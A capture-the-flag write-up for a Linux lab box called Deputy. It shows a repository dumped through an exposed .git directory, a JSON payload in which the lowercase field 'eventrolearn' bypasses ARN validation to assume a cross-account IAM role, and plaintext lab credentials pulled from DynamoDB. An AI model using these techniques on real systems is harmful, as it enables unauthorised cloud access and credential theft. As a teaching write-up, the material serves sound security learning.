Myles Nieman
← All writeups

Deputy

Overview

Deputy is a medium Linux box built around a cloud-flavored web application. A .git directory left exposed on the web server leaks Terraform infrastructure files that include AWS IAM ARNs. The application’s event-role endpoint silently accepts a lowercase field name (eventrolearn) that bypasses frontend validation, allowing those ARNs — with a substituted account ID — to be used across account boundaries. That grants access to a DynamoDB table holding credentials for a mark account, which in turn leads to a second set of credentials that serve as the root password.

Path: exposed .git → Terraform ARN leak → cross-account IAM role via parameter case bypass → DynamoDB credential dump → root.

Enumeration

The initial scan reveals a web server on port 80. The nmap output confirms a Linux host serving a web application.

Nmap results for Deputy

Directory brute-forcing surfaces a .git directory at the root of the web server — a classic misconfiguration that exposes the entire repository history to unauthenticated access.

Foothold — Git Dump and ARN Discovery

With a .git directory exposed, GitTools/Dumper can reconstruct the repository:

$ git clone https://github.com/internetwache/GitTools
$ cd GitTools/Dumper
$ ./gitdumper.sh http://deputy.htb/.git/ /tmp/deputy-git

GitTools dumper pulling the exposed .git directory

Reconstructing the working tree reveals Terraform configuration files:

Terraform files recovered from the git dump

The Terraform configs contain AWS IAM ARNs used to provision the application’s backend infrastructure — notably a role ARN tied to a DynamoDB event helper.

Enumeration — Web Application

Browsing to the web application shows a registration and login flow:

Deputy web application landing page

Registering an account (myles:myles123) and logging in reveals that authentication is handled via a JWT:

Authenticated session JWT visible in browser

The application also exposes a guest account (guest-user:guest-password) that can be used to explore:

Guest account login

Application functionality available to guest user

The application ties accounts together via a redirect mechanism:

Account linking via redirect

Account linking confirmed

Exploitation — Cross-Account IAM Role Bypass

The application exposes a role creation endpoint that accepts a JSON body with eventName, eventRoleArn, and eventTable. The frontend hardcodes an ARN, but intercepting the request in Burp allows modification:

Role creation form accepting Name, ARN, and Table parameters

Substituting the ARN from the git dump with the target account ID yields the first attempt:

First ARN substitution attempt with target account ID

Publishing the role

Initial result after publishing

The field name eventRoleArn (camelCase) is validated and restricted on the frontend. However, sending eventrolearn (all lowercase) bypasses the validation entirely — the backend accepts it without complaint:

{"eventName":"AllowEventHelperDynamoDBAccess","eventrolearn":"arn:aws:iam::789411671902:role/eventhelper","eventTable":"servers"}

Lowercase field name bypasses ARN validation

User — DynamoDB Credential Leak

With the cross-account role assumed, the application queries a DynamoDB table named servers. The response includes plaintext credentials:

DynamoDB record returned with mark’s credentials

mark@deputy.htb : bVhrE29cSbLP
[{"Password":"bVhrE29cSbLP","Server":"hws","Username":"mark","data":"servers","name":"hws-info"}]

Logging into the application as mark works:

Logged in as mark

Mark’s account view

Root

Exploring the application further as mark reveals an additional password:

Application reveals the password D3puty0GfhCe

The password D3puty0GfhCe is the root password on the underlying host, granting direct privilege escalation.

Takeaways

  • Exposed .git directories are a full source-code leak. Infrastructure code in the repository — Terraform files, ARNs, account IDs — hands an attacker the map to your cloud backend before they’ve touched a single endpoint.
  • API field-name case sensitivity is not a security boundary. Trusting the frontend to enforce which fields are sent, while the backend silently accepts alternate casings of the same parameter, is a trivially bypassable control.